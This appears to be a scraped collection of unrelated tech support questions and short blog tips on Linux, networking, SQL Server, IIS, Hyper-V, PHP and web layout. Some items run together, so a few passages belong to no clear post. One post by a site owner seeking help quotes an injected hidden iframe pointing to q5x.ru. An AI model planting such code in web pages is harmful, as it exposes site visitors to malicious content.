• Installing perforce visual client on linux

  I am from Mac background trying my hand at installing perforce client visual(P4V) on my linux box.For this I download the correct version here and untar the files. Then I cd to the directory ~/Desktop/p4v-2012-blah-blah/bin I also say chmod +x p4* After this i try running p4v (by double clicking) but I dont see anything .The file type is shown as a "text executable" but i dont know why it is not running. On mac i had done the same thing -just clicked on p4v and the client would show up(where I filled the server address and everything )But not sure what is going wrong here.Can someone give me directions? FWIW i did check out this link .

• Unhappy with performance of GBit Ethernet to Fiber converter

  I just bought a TP-Link MC200CM GBit Ethernet (1000-T) to Fiber (1000-SX) media converter. The device works but I'm unhappy with the performance: When connecting my computer over 1000-T (twisted pair, Cat 6, 18meters) with my server, I get a throughput of about 610MBit/s. If I replace the cable with two media converters, I'm left with about 310-315MBit/s (i.e. half the performance). My setup is like this: Computer <- GBit switch <- long cable <- GBit switch <- server Computer <- GBit switch <- MC200CM <- 30m fiber <- MC200CM <- GBit switch <- server Is there a way to improve the performance? Will another MC be faster? Or is that about as much as I can expect with the additional 2 converters?

• Vista machine hardwired cannot see xp laptop on wireless

  I have a laptop with windows xp, connected to my wireless router. I am trying to view the shared files on the laptop with my vista desktop computer. The desktop computer is hardwired to the same router. I can see the desktop pc fine on the xp laptop, and view the shared folders. I cannot see the xp laptop when on the desktop pc. I have tried installing the link update for xp, that is not the issue. I have also tried turning off firewalls, no dice. I have scoured google for this issue, and do not see any resolutions. Any suggestions would be appreciated.

• Database Connectivity Test with UDL File

  I bounced around between projects a lot last week.  What each project had in common was the need to validate at least one SQL connection.  Whether you have SQL tools like SSMS installed or not, this is a very easy task if you are aware of the UDL (Universal Data Link) files.  Create a new file and name it anything as long as it has the .udl extension. Open the file, choose a provider: Click Next >> or navigate to the Connection Tab to provide connection information.  Once you provide server and login credentials, the database list will populate.  At this point, you know the connection is valid. but go ahead and click the Test Connection button anyway. On the final tab, you can provide extra connection information like Application Name which can come in handy.  The All tab is beneficial if you want to build a valid connection string to include in your own applications.  If you save the file and then open in Notepad, you’ll find that said connection string: Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=master;Data Source=(local);Application Name=TestApp I hope this tip helps save you some time.  How do you test if you don’t have SSMS installed?

• IIS 7.5 - Remove the pipe character from usernames for virtual hosts

  Currently I have a setup with a virtual FTP site in IIS 7.5 that requires the following authentication details for the anonymous account: Host: ftp.mydomain.com User: ftp.mydomain.com|anonymous Pass: <none> I have multiple FTP accounts setup on this same server. I know that this means I need to specify the domain in the username to let IIS know what I need site to authenticate against, but is it possible to make the username only be anonymous? Would I have to create a user by that name in the windows users and groups area to be and specifically link it there?

• Cookies blocked by router?

  Hello, My friend has a D-Link DI-524 router that she uses for her home broadband. It's a pretty vanilla setup with the standard firewall settings, DHCP enabled etc. However, recently she has experienced something strange - cookies are not working on every computer on her LAN, whether using FF3.5 or IE8. I tried viewing the HTTP traffic using Fiddler2, and the requests come through fine (mind you, Internet browsing still works flawlessly) but whenever a website tries to set a cookie using the "Set-Cookie:" header, my computer sees that line as "Set-*ookie:" with the cookie contents removed. I have never seen anything like this - do you have any idea? Regards, Martin

• July, the 31 Days of SQL Server DMO’s – Day 31 (sys.dm_server_services)

  The last DMV for this month long blog session is the sys.dm_server_services DMV. This DMV returns information about your SQL Server, Full-Text, and SQL Server Agent related services. To further illustrate the information this DMV contains, lets run it against our Training instance that we have been using for this blog series. SELECT * FROM sys.dm_server_services The first column returned by this DMV is the actual Service Name. The next columns are the startup_type and startup_type_desc columns which display your chosen method for how a particular method should be started. The next columns status and status_desc display the current status for each of your Services on the instance. The process_id column represents the server process id. The last_startup_time column gives you the last time that a particular service was started. The service_account column provides you with the name of the account that is used to control the service. The filename column gives you the full path to the executable for the service. Lastly we have the is_clustered column and the cluster_nodename which indicates whether or not a particular service is clustered and is part of a resource cluster group, and if so, the cluster node that the service is installed on. This is a good DMV to provide you with a quick snapshot view of the current SQL Server services you have on your instance. • What is controlling the desktop display?

  I have two Ubuntu systems and in the course of changing configurations something has become muddled. I have disabled Unity in favor of gnome shell, the older style display of the desktop. Then I installed xfce 4. Seemed everything would be working okay, and for the most part it does. Except I noticed that on one system there's something else controlling settings. On one, if I right click the desktop, I get the menu with the options: open in new window create launcher... create url link... create folder... create from template -> open terminal here paste desktop settings... properties... applications -> On system two, right clicking brings up the menu: Create new folder Create new document -> organize desktop by name keep aligned paste Change Desktop Background Additionally, even though I set the background with the xfce settings manager, on system two that background will appear for a few seconds before it's replaced by something that looks like a background from Ubuntu's original desktop. And it's being controlled by what comes up with the "change desktop background" when right clicking, which isn't the xfce settings manager. On the first system, that right click does bring up the xfce settings tool. In short, something is controlling/overriding the xfce settings on machine two, but I can't find what file or configuration tool is doing it. How can I get system two to behave as system one, giving control of settings and configuration of X to XFCE's tools?

• Performance issue when configuring non HA VM in cluster

Although you can do this by using Hyper-V (VMM does not allow it), the non-highly available virtual machines will consume resources that otherwise would be available to the HAVMs What kind of resources (CPU,memory, NIC, etc) that non HA VM will consume? Just curious as not all VM (in production) not to be in Failover Cluster and Live Migration. If i put the VM into CSV but did not make it as HA, what impact does it make since i allocate same vCPU, vNic and VMemory into the VM. (not to mention that i lost failover feature). Curious to understand more about this. Please advise. Thanks

  The costs of technology assets can become significant and the need to centralize, monitor and control the contribution of each technology asset becomes a paramount responsibility for many organizations. Through the implementation of various mechanisms, it is possible to obtain a holistic vision and develop synergies between different assets, empowering their re-utilization and analyzing the impact on the organization caused by IT changes. When the SOA domain is considered, the issue of governance should therefore always come into play. Although SOA governance is mandatory to achieve any measure of SOA success, its value still passes incognito in most organizations, mostly due to the lack of visibility and the detached view of the SOA initiatives. There are a number of problems that jeopardize the visibility of these initiatives: Understanding and measuring the value of SOA governance and its contribution – SOA governance tools are too technical and isolated from other systems. They are inadequate for anyone outside of the domain (Business Analyst, Project Managers, or even some Enterprise Architects), and are especially harsh at the CxO level. Lack of information exchange with the business, other operational areas and project management – It is not only a matter of lack of dialog but also the question of using a common vocabulary (textual or graphic) that is adequate for all the stakeholders. We need to generate information that can be useful for a wider scope of stakeholders like Business and enterprise architectures. • how do I match movement of an object from 2d video into a 3d package ?

  I'm trying to add objects in a 3d package(Blender) using recorded footage. I've played with Icarus and it's great to capture the camera movement. Also the Blender 2.41 importer script works in Blender 2.49 as well. The problem is I can't seem to get 3d coordinates for objects. I have tried Autodesk(RealVIZ) MatchMover 2011 and gone through the tutorials. Tutorial 3 shows how to link a vertex from a 3d mesh to a 2d trackpoint, but the setup is for camera movement. Tutorial 4 goes into Motion capture, but it uses 2 videos of the same motion taken with 2 cameras from different viewpoints. I've tried to bypass that using the same footage twice, but that failed, as the 3d coordinate system ends up messed up. What software do you recommend for this (mapping 3d coordinates to 2d tracked points and importing them into a 3d package) ? What is the recommended technique ? Any good examples out there ? • How to have other divs with a flash liquid layout that fits to the page?

  Basically the majority of my content is flash based. I designed it using Flash Builder (Flex) and Its in a liquid layout, (everything is in percents) and if im JUST embedding the flash content it scales to the page fine, and i have the flash content set to have a padding of 50 px. I put a header div in fine with no problems, but I have 2 problems, the first being the footer div seems to cover up the buttom of the flash content in IE, but it looks just fine in chrome. How can I solve this? I'm using the stock embed code that Flex provides, I tried to edit the css style for the div which I think is #flashContent and give it a min width and min height but it didnt seem to work, actually anything I did to #flashContent didn't seem to do anything, maybe its not the div i need to be adding that attribute to... And my other problem is I dont even know where to start when it comes to placing a div thats 280width by 600height colum to the right side of the flash content. If i could specify a size for the flash content, and the float it left, and float the colum right, and clear it with the container div id be just fine....But remember the flash content is set to 100% Scale (well techically 100%x80% because it looked better that way). Does anyone know how I can start to deal with creating a more complex scaleable flash layouts that includes other divs? ALL WELL MAINTAINING IE SUPPORT? IE is ruining my life. • Operation MVC

  It was time to create a new site. I figured VS 2010 is out so I should write it using MVC and Entity Framework. I have been very happy with MVC. My boss has had me making an administration web site in MVC2 but using 2008. I think one of the greatest features of MVC is you get to work with root of the app. It is kind of like being an iron worker; you get to work with the metal, mold it from scratch. Getting my articles out of my database and onto web pages was by far easier with MVC than it was with regular ASP.NET. This code is what I use to post the article to that page. It's pretty straightforward. The link in the menu is passes the id which is simply the url to the page. • Subversion 1.7 on 12.04 precise: libsasl error, compiling from source?

  Background: I am a longtime Gentoo user, and this is my first time using Ubuntu (installed on a VM to avoid compiling everything from scratch). I am familiar with a Linux environment but somewhat unfamiliar with Ubuntu. I am trying to install Subversion 1.7 on Ubuntu and saw this post: Where can I find a Subversion 1.7 binary? The above post recommends using the PPA ppa:dominik-stadler/subversion-1.7. I also found the PPA ppa:svn/ppa from another link. They both cause problems for me. The issue is that any svn operation using the remote server causes the following error: svn: E170001: Unable to connect to a repository at URL 'svn+ssh://my_repo' svn: E170001: Could not create SASL context: generic failure: No such file or directory This seems to arise from a recent bug involving SVN dependency on the libsasl library, as documented by Debian users here: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683555 and also Mac users here: https://trac.macports.org/ticket/34861 Resolution seems to involve either updating the cyrus-sasl or libsasl library to a newer version (neither of which is in the latest apt packages), or compiling subversion without SASL support. As a Gentoo user I started looking into how to compile svn from source, but it looks way more complicated on Ubuntu than I'm used to and I'm not sure what the canonical way is. My questions: Is there an obvious fix for this problem that I am overlooking? Is there a way to update the dependencies for SVN to something that works through using synaptic or apt-get? If I want to compile from scratch, how do I use the sources in the PPA instead of downloading my own source copy (i.e. the PPA has both binary and sources?)

• No compatible network card

  Motherboard: Asus K8N-E Deluxe with onboard NIC (nVidia nForce) Secondary NIC: I've tried using a standard NIC (Device Manager displays this as D-Link DFE-538TX 10/100, but under manufacturer in the General tab of the properties in Windows it states Realtek Semiconductor Corp.) I have downloaded ESXi 4.0.0 build 208167 and cooked to disc. I've booted from it, the .TGZ modules load from the yellow and grey screen, the progress bar reaches to about 60% and like a second later the screen changes and I have the following information on screen; "No compatible network adapter found. Please consult the HCG." I've checked the HCG and found that my motherboard is listed. I also get the same message with the secondary NIC. Any ideas please?

• Website attacked with a hidden iframe (q5x.ru)

  A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe, and it's source was from a site q5x.ru (do not link). A Google search didn't help me in figuring out how this attack my have took place, so I was wondering if anyone of you may have encountered this same problem? The iframe code was something of the sort: <iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe> As per request, I am running an ASP.Net website with a database, and as regards forms, it's obviously the ASP.Net form that's used for postbacks.

  The program evince complains that it can't find libfreetype.so.6; however I clearly have the file and its included in my LD_LIBRARY_PATH; furthermore I have another program which uses libfreetype6 and is able to run just fine. • PDO - WHat is it? How do I enable it on shared hosting.

  I have a shared hosting account and PHP5 is installed and running. When I view phpinfo, I can see that mysql pdo is running. I think I need to "link" to it from the php.ini file. But I dont know for sure. I read that I needed to type "extension=pdo.so". I did that, and it did nothing. I contacted my hosting support, they said I need to rename php.ini to php5.ini. Did that and nothing. I am stuck and trying to install Kimai, but cannot without fixing this pdo problem. I have searched for a good hour and can find nothing to help me.

• Using Windows 7 drivers in Windows Server 2008 R2

  Maybe I should post this to http://www.serverfault.com. Windows 7 comes with all sorts of signed drivers so there's high probability that all drivers for your machine will be installed during system setup. On the other hand Windows Server 2008 doesn't event though it's practically the same OS when it comes to drivers. But I know that this has a very good reason. It's a server product, not a desktop one. But the thing is that many power users and developers use server OS on their workstations which are normally desktop machines and would need Windows 7 driver spectrum... Question I know I've been reading about some trick on the internet that first installed Windows 7 on the machine, than do something to get either all Windows 7 driver collection or just those installed, and then install Windows Server 2008 and use those drivers. The thing is: I can't seem to find these instructions on the internet any more. If anybody knows where these are please provide the link for the rest of us.
